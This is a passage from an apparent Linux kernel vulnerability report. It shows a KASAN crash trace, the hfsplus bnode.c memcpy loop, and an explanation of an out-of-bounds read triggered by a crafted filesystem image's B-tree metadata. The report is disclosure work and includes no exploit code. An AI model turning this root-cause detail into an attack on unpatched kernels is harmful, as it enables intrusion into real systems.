__kasan_slab_free+0x13c/0x1a0 [ 278.860106] ? kasan_slab_free+0xe/0x10 [ 278.860901] ? kmem_cache_free+0x89/0x1e0 [ 278.861731] ? putname+0x80/0x90 [ 278.862421] ? filename_lookup+0x191/0x280 [ 278.863268] ? kasan_unpoison_shadow+0x36/0x50 [ 278.864181] ? kasan_kmalloc+0xad/0xe0 [ 278.864960] ? kmem_cache_alloc_trace+0x102/0x200 [ 278.865940] hfsplus_setxattr+0x8a/0xb0 [ 278.866734] hfsplus_user_setxattr+0x27/0x30 [ 278.867616] __vfs_setxattr+0x7c/0xa0 [ 278.868378] __vfs_setxattr_noperm+0x8d/0x200 [ 278.869275] vfs_setxattr+0xb3/0xc0 [ 278.870013] setxattr+0x1b3/0x260 [ 278.870706] ? vfs_setxattr+0xc0/0xc0 [ 278.871465] ? filename_lookup+0x191/0x280 [ 278.872307] ? filename_parentat+0x2b0/0x2b0 [ 278.873186] ? kasan_kmalloc+0xad/0xe0 [ 278.873976] ? kasan_check_write+0x14/0x20 [ 278.874831] ? strncpy_from_user+0xa8/0x1c0 [ 278.875700] ? __mnt_is_readonly.part.13+0x23/0x30 [ 278.876686] ? __mnt_want_write+0x9d/0xb0 [ 278.877516] path_setxattr+0x134/0x170 [ 278.878306] ? setxattr+0x260/0x260 [ 278.879037] ? 
vm_brk+0x20/0x20 [ 278.879695] __x64_sys_setxattr+0x6d/0x80 [ 278.880524] do_syscall_64+0x78/0x170 [ 278.881289] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 278.882338] RIP: 0033:0x7f5a927e71fa [ 278.883079] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 278.886915] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 278.888448] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa [ 278.889903] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080 [ 278.891341] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000 [ 278.892780] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0 [ 278.894234] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000 [ 278.895683] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 278.905583] ---[ end trace 7f5a46c7478f1297 ]--- [ 278.906815] RIP: 0010:__memcpy+0x12/0x20 [ 278.907624] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4 [ 278.911448] RSP: 0018:ffff8801e8db7430 EFLAGS: 00010246 [ 278.912514] RAX: a805570000016000 RBX: 0000000000001000 RCX: 0000000000000200 [ 278.913989] RDX: 0000000000000000 RSI: 700556c000016000 RDI: a805570000016000 [ 278.915422] RBP: ffff8801e8db7450 R08: 
ffffed003e09c499 R09: ffffed003e09c499 [ 278.916845] R10: 0000000000000001 R11: ffffed003e09c498 R12: a805570000016000 [ 278.918316] R13: 700556c000016000 R14: ffff8801e082db60 R15: 0000000000001000 [ 278.919754] FS: 00007f5a92cc6700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 278.921366] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 278.922571] CR2: 00007f828de0901a CR3: 00000001e5612000 CR4: 00000000000006f0

- Location

https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L152

	while ((len -= l) != 0) {
		l = min_t(int, len, PAGE_SIZE);
		memcpy(kmap(*++dst_page), kmap(*++src_page), l);
		kunmap(*src_page);
		set_page_dirty(*dst_page);
		kunmap(*dst_page);
	}

The out-of-bounds access happens in this memcpy(), as KASAN reports: the faulting 8-byte read lies 0 bytes past the 96-byte object allocated in __hfs_bnode_create(), which is consistent with `*++src_page` / `*++dst_page` stepping past the end of a bnode's page-pointer array when the copy length derived from the crafted image's B-tree metadata exceeds what the node was sized for.

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.